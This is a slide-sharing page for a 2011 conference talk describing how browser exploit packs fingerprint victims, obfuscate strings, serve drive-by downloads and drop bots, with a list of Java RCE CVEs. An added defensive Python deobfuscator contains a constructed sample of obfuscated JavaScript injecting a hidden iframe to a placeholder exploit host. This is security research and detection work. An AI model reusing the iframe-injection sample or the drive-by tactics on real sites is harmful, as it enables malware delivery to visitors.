Browser Exploit Packs
Exploitation Tactics
ToorCon Security Conference
SEATTLE, 2011

Aditya K Sood | Richard J Enbody
SecNiche Security | Department of Computer Science and Engineering
Michigan State University
About Us
 Aditya K Sood
   ─ Founder, SecNiche Security
       ● Independent Security Consultant, Researcher and Practitioner
       ● Worked previously for Armorize, Coseinc and KPMG
       ● Active speaker at security conferences
       ● Written content: ISSA / ISACA / CrossTalk / HITB / Hakin9 / Elsevier NES|CFS
       ● LinkedIn: http://www.linkedin.com/in/adityaks
       ● Website: http://www.secniche.org | Blog: http://secniche.blogspot.com
   ─ PhD Candidate at Michigan State University
 Dr. Richard J Enbody
   ─ Associate Professor, CSE, Michigan State University
       ● Since 1987, teaching computer architecture / computer security / mathematics
       ● Website: http://www.cse.msu.edu/~enbody
   ─ Co-author of the CS1 Python book, The Practice of Computing Using Python
   ─ Patents pending: Hardware Buffer Overflow Protection
Agenda
 BEP Generic Framework
   ─ BEP Insidious Details
 BEP Trades and Tactics
       ● Plugin Detection and Verification
       ● String Obfuscation, Replacement and Manipulation
       ● User Agent Based Fingerprinting
       ● IP Logging Detection Trick
       ● Drive By Downloads
       ● Drive By Cache
       ● BEPs and Botnets Collaboration
 Future Work and Discussion
BEP Generic Framework
 BEP Framework
  ─ Detecting Patterns
      ● Fingerprinting the victim environment
      ● Applying the built-in techniques that support exploitation
      ● A robust approach to preparing the ground before serving exploits

  ─ Supporting Objects
      ● JavaScript event handlers
      ● Document Object Model (DOM) objects
      ● Dynamic content generation
      ● Requests across domains

  ─ Exploit Trigger
      ● Serving exploits efficiently
      ● Dropping a malicious executable or bot onto the victim machine
BEP Configuration Check
 BEP Framework
  ─ Configuration (Admin Panel + Execution Environment)
      ● The payload setting determines the malicious executable to be dropped
           – BEPs are a supporting agent for botnets, so, of course, bots are what gets dropped
      ● Apart from the normal settings, the exploit distribution environment is configured here
PHP Ion Cube Encoder
 PHP Ion Cube Encoder
   ─ Why?
      ● Most BEPs are written in PHP.
      ● Encodes all the exploits robustly (efficient code protection)
           – All PHP files in a BEP are encoded except the configuration file
           – Compiled files cannot be restored back to source level
                » Protection is applied at compilation time
           – Encoded files carry digital signatures
           – MAC protection is enabled
      ● Exploit detection becomes hard

   [Figure: stacked encoding layers {1}, {2}, { … }, {n} on top of optimized compiled byte codes]
Max Mind Geo Location Library
 Tracking and Tracing
   ─ Open source library for statistical analysis
       ● Most BEPs and botnets explicitly use this library
       ● However, using this particular library is not a hard requirement
            – Malware writers can also use custom-designed tracking code
            – Tracking of some form is an integral part of any BEP
Trade and Tactics
Plugin Detection and Verification
 Plugin Verification and Version Detection
   ─ Plugin Detection! Why?
       ● Enumerating the plugins installed in the browser
       ● Serving exploits based on the installed versions of the various plugins
           – The generic PluginDetect.js script is used to obtain this information
   ─ Example: Phoenix Browser Exploit Pack
       ● GetJavaInfo.jar
           – Decompilation reveals the generic code for detecting the installed Java version
           – Used to verify the matching exploit
String Encoding and Replacement
 Encoding Tactics
   ─ String manipulation
       ● Defining variables to obscure what is really happening
                » Declaring strings in reverse order and reversing them during execution
                » Passing the required string through a dedicated string-replacement class
                » Randomizing the BEP file names
String Tampering - Example
User Agent Based Fingerprinting
IP Logging Detection Trick (IPLDT)
 What is it all about?
   ─ Hampering the analysis process
           – An exploit is served only once to a given IP address
           – The BEP uses the GeoLocation PHP library to keep track of IP addresses
           – The appropriate check is performed before serving the exploit
                » If the IP has already been served, no more exploits are delivered
                » In other words, no further infection attempts against that specific IP address
Long Live – Drive By Downloads
 Inside Drive By Downloads
         – Serving malware by forcing users to visit an infected website
         – An iframe is injected into vulnerable websites
         – The exploit is served silently, based on the browser environment
Long Live – Drive By Downloads
 Complete Process
         – The victim's browser is forced to visit an infected website
         – The iframe redirects the browser to the EXPLOIT POINT (Exploit Hub)
         – The exploit is served after fingerprinting the browser environment
         – The browser is exploited successfully
         – The exploit point silently requests the malware from the malicious domain
               » This step can be self-driven
         – The malware is downloaded onto the system and automatically installed
Wait! Drive By Cache. What?
 What is it?
           – The brother of drive-by download attacks. Is it?
           – A more efficient way to bypass anti-virus protection.

 Comparison – Drive By Download / Drive By Cache
           – Very few variations have been noticed so far (Drive By Cache)
           – However, the infections are still in the wild and some traces have been noticed
           – There is a lot more to research on this attack, but the work has already been started
           – Reference: http://blog.armorize.com/2011/04/newest-adobe-flash-0-day-used-in-new.html
BEPs & Botnets Collaboration
 Is This a True Artifact?
   ─ Yes it is.
            – BEPs are used in conjunction with botnets
            – On successful exploitation, a bot is dropped onto the victim machine
            – Harnessing the power of two different frameworks to deliver malware
            – Some traces have been seen of ZEUS (botnet) + BlackHole (BEP)
Top 5 Java Exploits – BEP Choice
 Finest and Fast Five Java Exploits
   ─ High exploitation and infection rate
           – Sun Java Runtime Environment Trusted Methods Chaining Remote Code Execution Vulnerability (CVE-2010-0840)
           – Java JRE MixerSequencer Invalid Array Index Remote Code Execution Vulnerability (CVE-2010-0842) | Java JMF MIDI
           – Java unspecified vulnerability in the Java Deployment Toolkit component in Oracle Java SE (CVE-2010-0886)
           – Sun Java Runtime RMIConnectionImpl Privileged Context Remote Code Execution Vulnerability (CVE-2010-0094) | Java RMI
           – Java argument injection vulnerability in the URI handler in the Java NPAPI plugin (CVE-2010-1423)
Future Work and Discussion
    Hunting down the malware domains the way a hacker would
    Continuous analysis to dig deeper into the malware world
    Designing solutions and protection mechanisms
    Researching new and advanced hacking techniques
    Becoming smarter with the passage of time
Questions / Thanks

 Thanks to ToorCon (http://www.toorcon.org)
 Thanks to SecNiche Security (http://www.secniche.org)

 Malware at Stake (http://secniche.blogspot.com)

 
Browser Malware Taxonomy
Browser Malware TaxonomyBrowser Malware Taxonomy
Browser Malware Taxonomy
 
PenTest Magazine Teaser - Mobile Hacking
PenTest Magazine Teaser - Mobile HackingPenTest Magazine Teaser - Mobile Hacking
PenTest Magazine Teaser - Mobile Hacking
 
Dissecting Java Server Faces for Penetration Testing
Dissecting Java Server Faces for Penetration Testing Dissecting Java Server Faces for Penetration Testing
Dissecting Java Server Faces for Penetration Testing
 
VxWorks - Holistic Security (Art of Testing)
VxWorks - Holistic Security (Art of  Testing)VxWorks - Holistic Security (Art of  Testing)
VxWorks - Holistic Security (Art of Testing)
 
Art of InfoJacking, Source Conference Seattle, 2011
Art of InfoJacking, Source Conference Seattle, 2011Art of InfoJacking, Source Conference Seattle, 2011
Art of InfoJacking, Source Conference Seattle, 2011
 

Último

My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024The Digital Insurer
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsSergiu Bodiu
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024Lorenzo Miniero
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 3652toLead Limited
 
Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Scott Keck-Warren
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationRidwan Fadjar
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Commit University
 
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Patryk Bandurski
 
Vertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsVertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsMiki Katsuragi
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsRizwan Syed
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubKalema Edgar
 
Search Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdfSearch Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdfRankYa
 
Story boards and shot lists for my a level piece
Story boards and shot lists for my a level pieceStory boards and shot lists for my a level piece
Story boards and shot lists for my a level piececharlottematthew16
 
Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Enterprise Knowledge
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfAddepto
 
Vector Databases 101 - An introduction to the world of Vector Databases
Vector Databases 101 - An introduction to the world of Vector DatabasesVector Databases 101 - An introduction to the world of Vector Databases
Vector Databases 101 - An introduction to the world of Vector DatabasesZilliz
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024Stephanie Beckett
 
Commit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyCommit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyAlfredo García Lavilla
 
Artificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxArtificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxhariprasad279825
 

Último (20)

My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024
 
DMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special EditionDMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special Edition
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platforms
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365
 
Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 Presentation
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!
 
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
 
Vertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsVertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering Tips
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL Certs
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding Club
 
Search Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdfSearch Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdf
 
Story boards and shot lists for my a level piece
Story boards and shot lists for my a level pieceStory boards and shot lists for my a level piece
Story boards and shot lists for my a level piece
 
Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdf
 
Vector Databases 101 - An introduction to the world of Vector Databases
Vector Databases 101 - An introduction to the world of Vector DatabasesVector Databases 101 - An introduction to the world of Vector Databases
Vector Databases 101 - An introduction to the world of Vector Databases
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024
 
Commit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyCommit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easy
 
Artificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxArtificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptx
 

Toorcon Seattle 2011 - Browser Exploit Packs

  • 1. Browser Exploit Packs
       Exploitation Tactics
       ToorCon Security Conference, SEATTLE, 2011
       Aditya K Sood | Richard J Enbody
       SecNiche Security | Department of Computer Science and Engineering
       Michigan State University

  • 2. About Us
        Aditya K Sood
          ─ Founder, SecNiche Security
              ● Independent Security Consultant, Researcher and Practitioner
              ● Worked previously for Armorize, Coseinc and KPMG
              ● Active Speaker at Security conferences
              ● Written Content – ISSA/ISACA/CrossTalk/HITB/Hakin9/Elsevier NES|CFS
              ● LinkedIn: http://www.linkedin.com/in/adityaks
              ● Website: http://www.secniche.org | Blog: http://secniche.blogspot.com
          ─ PhD Candidate at Michigan State University
        Dr. Richard J Enbody
          ─ Associate Professor, CSE, Michigan State University
              ● Since 1987, teaching computer architecture / computer security / mathematics
              ● Website: http://www.cse.msu.edu/~enbody
          ─ Co-Author of the CS1 Python book, The Practice of Computing using Python.
          ─ Patents Pending – Hardware Buffer Overflow Protection

  • 3. Agenda
        BEP Generic Framework
          ─ BEP Insidious Details
        BEP Trades and Tactics
              ● Plugin Detection and Verification
              ● String Obfuscation, Replacement and Manipulation
              ● User Agent Based Fingerprinting
              ● IP Logging Detection Trick
              ● Drive By Downloads
              ● Drive By Cache
              ● BEP’s and Botnets Collaboration
        Future Work and Discussion

  • 4. BEP Generic Framework
        BEP Framework
          ─ Detecting Patterns
              ● Fingerprinting the victim environment
              ● Applying inherent techniques supporting exploitation
              ● Robust approach to set the ground before serving exploits
          ─ Supporting Objects
              ● JavaScript event handlers
              ● Document Object Model (DOM) objects
              ● Dynamic content generation
              ● Requests across domains
          ─ Exploit Trigger
              ● Serving exploits efficiently
              ● Dropping malicious executable or bot in the victim machine

  • 5. BEP Configuration Check
        BEP Framework
          ─ Configuration (Admin Panel + Execution Environment)
              ● Payload determines the malicious executable to be dropped
                  – BEPs are a supporting agent for botnets. Of course, bots are dropped.
              ● Apart from normal settings, the exploit distribution environment is set.

  • 6. PHP Ion Cube Encoder
        PHP Ion Cube Encoder
          ─ Why?
              ● Most of the BEPs are designed in PHP.
              ● Encodes all the exploits in a robust manner (efficient code protection)
                  – All PHP files in BEPs are encoded except the configuration file
                  – No restoration of compiled files back to source level.
                      » Protection is applied at compilation time
                  – Encoded files have digital signatures.
                  – MAC protection enabled.
              ● Exploit detection becomes hard
       [Diagram: Encoding Layer {1}, Encoding Layer {2}, Encoding Layer { … }, Encoding Layer {n} stacked over Optimized compiled Byte codes]

  • 7. Max Mind Geo Location Library
        Tracking and Tracing
          ─ Open source library for statistical analysis
              ● Most BEPs and botnets explicitly use this library
              ● However, it is not a hard restriction to use this library
                  – Malware writers can also use custom designed tracking code
                  – An inadvertent part of any BEP

  • 9. Plugin Detection and Verification
        Plugin Verification and Version Detection
          ─ Plugin Detection! Why?
              ● Enumerating the installed plugins in browsers.
              ● Serving exploits based on installed version of various plugins
                  – Generic PluginDetect.js script is used to attain the information
          ─ Example: Phoenix Browser Exploit Pack
              ● GetJavaInfo.jar
                  – Decompilation provides the generic code of detecting installed Java version
                  – Used to verify the appropriate exploit match

  • 10. String Encoding and Replacement
        Encoding Tactics
          ─ String manipulation
              ● Defining variables to obfuscate the reality
                  » Declaring the strings in reverse order during execution
                  » Passing the required string to definitive string replacement class
                  » Randomizing the BEP file names

  • 11. String Tampering - Example

  • 12. User Agent Based Fingerprinting

  • 13. IP Logging Detection Trick (IPLDT)
        What it is all about?
          ─ Hampering the analysis process
              – Exploit is served only once to a given IP
              – BEP uses the GeoLocation PHP library to keep track of IP addresses
              – An appropriate check is performed before serving the exploit
                  » If the IP has already been served, no more exploits are delivered
                  » In other terms, no further infection of that specific IP address

  • 14. Long Live – Drive By Downloads
        Inside Drive By Downloads
          – Serving malware by forcing users to visit an infected website
          – Iframe is injected into vulnerable websites
          – Exploit is served silently based on browser environment

  • 15. Long Live – Drive By Downloads
        Complete Process
          – Victim browser is forced to visit infected website
          – Iframe redirects browser to the EXPLOIT POINT (Exploit Hub)
          – Exploit is served by fingerprinting browser environment
          – Browser is exploited successfully
          – Exploit point silently asks for the malware from the malicious domain
              » It can be self driven
          – Malware is downloaded into system and automatically installed

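As an added analyst-side example (written for this page, not taken from the slides or from any exploit kit), the following Python statically undoes the two string-rebuilding idioms slide 10 describes (reversed literals and replace() chains), folds the pieces back together, and then checks the result for the landing-page indicators slides 9 and 14 name: PluginDetect.js, GetJavaInfo.jar and a hidden iframe. The page fragment, the variable names and the host exploit-hub.example.com are constructed for the demonstration.

```python
import re
# Constructed sample of a BEP landing-page fragment (not taken from any real kit):
# literals stored reversed or padded and rebuilt at run time, a plugin-enumeration
# script, and a 1x1 hidden iframe aimed at a placeholder host (exploit-hub.example.com).
SAMPLE_PAGE = r'''
<script src="js/PluginDetect.js"></script>
<script>
var a = "raj.ofnIavaJteG".split("").reverse().join("");
var b = "h--t--t--p".replace(/--/g, "");
var c = "/moc.elpmaxe.buh-tiolpxe//".split("").reverse().join("");
document.write('<iframe src="' + b + ':' + c + a + '" width="1" height="1" style="visibility:hidden"></iframe>');
</script>
'''

ASSIGN_RE = re.compile(r'var\s+(\w+)\s*=\s*(.+?);\s*$', re.M)      # var x = <expr>;
REVERSED_RE = re.compile(r'^"([^"]*)"\.split\(""\)\.reverse\(\)\.join\(""\)$')
REPLACE_RE = re.compile(r'^"([^"]*)"\.replace\(/([^/]+)/g,\s*"([^"]*)"\)$')
CONCAT_RE = re.compile(r"""(?:'[^']*'|"[^"]*"|\w+)(?:\s*\+\s*(?:'[^']*'|"[^"]*"|\w+))+""")
PART_RE = re.compile(r"""'([^']*)'|"([^"]*)"|(\w+)""")

# Landing-page indicators the deck names: plugin enumeration, the Java probe, hidden iframe
INDICATORS = [
    ("plugin enumeration script", re.compile(r"PluginDetect\.js", re.I)),
    ("Java version probe applet", re.compile(r"GetJavaInfo\.jar", re.I)),
    ("hidden 1x1 iframe", re.compile(r'<iframe[^>]*(?:width="1"|visibility:hidden)', re.I)),
]

def resolve_literal(expr):
    """Statically undo the two rebuild idioms (reversed literal, replace() chain)."""
    m = REVERSED_RE.match(expr)
    if m:
        return m.group(1)[::-1]
    m = REPLACE_RE.match(expr)
    if m:  # JS regex body reused as a Python regex; adequate for plain tokens like "--"
        return re.sub(m.group(2), m.group(3), m.group(1))
    return None

def resolve_strings(js):
    """Map every variable assigned from a rebuilt literal to its clear-text value."""
    values = {}
    for name, expr in ASSIGN_RE.findall(js):
        val = resolve_literal(expr.strip())
        if val is not None:
            values[name] = val
    return values

def inline_vars(js, values):
    """Fold 'lit' + var + 'lit' chains into one literal when every variable is known."""
    def fold(m):
        parts = []
        for sq, dq, ident in PART_RE.findall(m.group(0)):
            if ident and ident not in values:
                return m.group(0)          # unknown variable: leave the chain as is
            parts.append(values[ident] if ident else (sq or dq))
        return "'" + "".join(parts) + "'"
    return CONCAT_RE.sub(fold, js)

def scan(page):
    """Deobfuscate, then return the sorted indicator labels present in the page."""
    clear = inline_vars(page, resolve_strings(page))
    return sorted(label for label, rx in INDICATORS if rx.search(clear))

if __name__ == "__main__":
    print(resolve_strings(SAMPLE_PAGE), scan(SAMPLE_PAGE))
```

Only the two idioms the slides describe are handled; a real kit's randomised file names and other encoders would need further rules, and the recovered URL is a triage artefact to be checked against logs, not fetched.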
  • 16. Wait! Drive By Cache. What?
        What it is?
          – Brother of Drive by Download attacks. Is it?
          – More efficient way to bypass anti virus protections.
        Comparison – Drive By Download / Drive By Cache
          – Very few variations have been noticed (Drive By Cache)
          – However, the infections are still in the wild and some of the traces have been noticed
          – A lot more to research on this attack, but the work has already been started
          – Reference: http://blog.armorize.com/2011/04/newest-adobe-flash-0-day-used-in-new.html

  • 17. BEP’s & Botnets Collaboration
        Is This True Artifact?
          ─ Yes it is.
              – BEP’s are used in conjunction with botnets
              – On successful exploitation, bot is dropped into victim machine
              – Harnessing the power of two different frameworks to deliver malware
              – Some traces have been seen of ZEUS (Botnet) + BlackHole (BEP)

  • 18. Top 5 Java Exploits – BEP Choice
        Finest and Fast Five Java Exploits
          ─ High exploitation and infection Rate
              – Sun Java Runtime Environment Trusted Methods Chaining Remote Code Execution Vulnerability (CVE-2010-0840)
              – Java JRE MixerSequencer Invalid Array Index Remote Code Execution Vulnerability (CVE-2010-0842) | Java JMF MIDI
              – Java Unspecified vulnerability in the Java Deployment Toolkit component in Oracle Java SE (CVE-2010-0886)
              – Sun Java Runtime RMIConnectionImpl Privileged Context Remote Code Execution Vulnerability (CVE-2010-0094) | Java RMI
              – Java argument injection vulnerability in the URI handler in Java NPAPI plugin (CVE-2010-1423)

  • 19. Future Work and Discussion
        Hunting back the malware domains like a hacker
        Continuous analysis to dig deeper into malware world
        Designing solutions and protection mechanisms
        Researching new and advanced hacking techniques
        Becoming smarter with the passage of time

  • 20. Questions / Thanks
        Thanks to ToorCon (http://www.toorcon.org)
        Thanks to SecNiche Security (http://www.secniche.org)
        Malware at Stake (http://secniche.blogspot.com)